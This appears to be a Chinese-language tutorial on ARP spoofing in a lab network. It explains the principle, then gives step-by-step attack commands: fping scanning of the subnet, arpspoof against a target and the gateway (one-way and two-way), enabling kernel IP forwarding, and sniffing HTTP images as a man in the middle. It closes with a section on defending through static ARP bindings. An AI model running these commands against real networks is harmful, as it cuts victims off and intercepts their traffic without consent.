1.arp断网攻击
具体原理
第一步:假设主机A访问某网站,那么要告知某网站我的IP和MAC地址,但这是以广播的方式告知的;
第二步,由于是广播方式告知,猥琐的B主机也知道了A的IP和Mac地址,于是猥琐的B主机把自己伪装成某网站,给A发送回复,A误以为B就是某网站,因此更新了自己本机的ARP缓存;
第三步,两者建立连接,A不断将自己的请求发给B,可怜的某网站被挂在一边了。如果B又把自己伪装成主机A,从而转发A的请求给某网站,然后网站C再回复给"A"(实为主机B)转发给A,那相当于A的流量都从B经过,这就是步骤4,因此B可以实现会话劫持;如果B给A的是一个假地址,那么A就永远上不了网了。
1.实战准备
1.1扫描可攻击的目标
fping -asg 192.168.123.0/24
1.2查看目标IP
ipconfig
1.3开始攻击
arpspoof -i 网卡 -t 靶机IP地址 网关
双向欺骗
`arpspoof -i eth0 -t 10.9.63.1 -r 10.9.63.222`
例子:
arpspoof -i eth0 -t 192.168.123.24 192.168.123.1
字段 | 内容 |
---|---|
-i | 指定网卡 |
-t | 靶机ip地址 |
arp -a
查看局域网中的IP-MAC对照表
发现Win7的10.9.63.1(网关)的MAC地址已经变成了Kali eth0网卡的MAC地址
2.如何防护arp攻击
1.将网关 改为静态即可
找到网线或网卡对应的idx
netsh i i show in
临时防御 重启就无效了 将网关改为静态
arp -s 网关 mac地址
-
查看网卡号
netsh i i show in
-
静态arp绑定
-
临时绑定
arp -s IP MAC
netsh -c i i add ne Idx IP MAC store=active
-
永久绑定
netsh -c i i add neighbors Idx IP MAC地址
-
-
解除绑定
arp -d IP MAC
netsh -c i i delet ne Idx
1.1永久更改
netsh -c “i i” add ne 20 10.9.63.1 50-6f-77-89-ad-94
netsh -c “i i ” delete ne 20 删除
-c Context 指定上下文
i: interface 更改到 `netsh interface’ 上下文。
i:ipv4
add: 在项目列表上添加一个配置项目
neighbors: 添加邻居地址
2.360安全的流量防火墙
3.中间人抓取http流量信息
中间人攻击获取图片信息
1.arp攻击 将arp缓存表 变成kali对应的mac地址
arpspoof -i enth0 -t 10.9.63.224 -r 10.9.63.1
-i 参数用于指定一块网卡,必须指定,没有默认值。
-t 参数后的第一个IP地址是目标的主机,第二个IP地址是你需要伪装主机(网关) 。
-c 参数的三个选项:own、host或both。选择own或host,arpspoof在清理时会给目标主机每隔1秒发送1个ARP响应包共计5个,若选择both,则总共发送10个ARP响应包,耗时10秒。
-r 参数 能嗅探到来往两个方向的数据包。
2.开启内核转发
echo 1 >/proc/sys/net/ipv4/ip_forward
3.访问之前浏览器 开始抓包
4.过滤http协议 找到png jpg的数据包
复制点击 保存value值 复制到浏览器打开就能看见图片